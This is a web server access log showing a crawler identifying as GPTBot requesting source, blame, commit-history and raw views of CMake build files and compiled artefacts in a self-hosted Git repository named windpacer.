-[17/Feb/2026:16:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17038] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12947] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10810] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13712] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13713] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17966] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13649] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14152] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12882] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44561] [Gzip 32.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:16:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 